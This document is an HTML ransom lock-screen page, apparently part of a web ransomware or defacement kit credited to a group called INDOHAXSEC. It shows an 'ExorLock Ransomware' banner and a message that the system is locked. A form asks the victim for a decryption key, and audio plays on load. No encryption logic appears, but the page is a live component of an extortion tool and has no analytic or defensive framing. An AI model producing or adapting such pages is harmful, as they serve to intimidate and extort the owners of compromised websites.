
<html>

<head>
    <link rel="icon" type="image/gif" href="https://s-media-cache-ak0.pinimg.com/236x/a7/76/ec/a776ec52e575d0473d33557aa610e47d--skull-fashion-flower-tattoos.jpg">
    <link href="https://fonts.googleapis.com/css?family=Iceland" rel='stylesheet' type='text/css'>
    <title> RANSOMWARE INDOHAXSEC</title>
    <style type="text/css">
        body {
            background: black;

            color: #e2e2e2;
        }

        .selecte {
            border-color: lime;
            width: 300px;
            height: 30px;
            background-color: transparent;
            color: lime;
        }

        .inpute {
            width: 500px;
            height: 20px;
            border-color: #EA2A14;
            background-color: transparent;
            color: lime;
            text-align: center;
        }

        .submite {
            width: 200px;
            border-color: red;
            background-color: transparent;
            color: red;
        }

        textarea {
            border-color: #EA2A14;
            width: 100%;
            height: 400px;
            padding-left: 5px;
            margin: 10px auto;
            resize: none;
            background: transparent;
            color: #ffffff;
            font-size: 13px;
        }
    </style>
</head>

<body>
    <center>
        <pre>
<font color = "lime"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
  ______                _                _      _____                                                       
 |  ____|              | |              | |    |  __ \                                                      
 | |__  __  _____  _ __| |     ___   ___| | __ | |__) |__ _ _ __  ___  ___  _ __ _____      ____ _ _ __ ___ 
 |  __| \ \/ / _ \| '__| |    / _ \ / __| |/ / |  _  // _` | '_ \/ __|/ _ \| '_ ` _ \ \ /\ / / _` | '__/ _ \
 | |____ >  < (_) | |  | |___| (_) | (__|   <  | | \ \ (_| | | | \__ \ (_) | | | | | \ V  V / (_| | | |  __/
 |______/_/\_\___/|_|  |______\___/ \___|_|\_\ |_|  \_\__,_|_| |_|___/\___/|_| |_| |_|\_/\_/ \__,_|_|  \___|
                                                                                                            

	 
 -[ INDOHAXSEC TEAM ]-
 
 System :  LOCKED STATUS ! CAN NOT BE ACCESSED!
 <br>
 #LOCKED BY K3T0PR4K 
 <br>
 #DEADLY RANSOMWARE ATTACK!
THIS RANSOMWARE USES THE SSL RANSOM TYPE<br>
IF YOU WANT TO OPEN IT, ENTER PASSWORD DECRYPT<br><font size="5"><font color='red' face='iceland'> STATTUS: LOCKED!<br>
<style type='text/css'>
                .inpute {
                    width: 500px;
                    height: 50px;
                    border-color: #EA2A14;
                    background-color: transparent;
                    color: lime;
                    text-align: center;
                }

                .submite {
                    width: 200px;
                    border-color: lime;
                    background-color: transparent;
                    color: lime;
                }
            </style>

<form action="" method="post" style=" text-align: center;">
                <input type="text" name="key" class="inpute" placeholder="Decryption Key" autocomplete="off"><br>
                
                <input type="submit" name="submit" class="submite" value="UNLOCK RANSOMWARE" />
 </form>
<script>
    if ( window.history.replaceState ) {
        window.history.replaceState( null, null, window.location.href );
    }
</script><br><audio autoplay="autoplay" controls="controls" src="https://e.top4top.io/m_1581vn1q91.mp3"></audio>
        </h2>
        </font>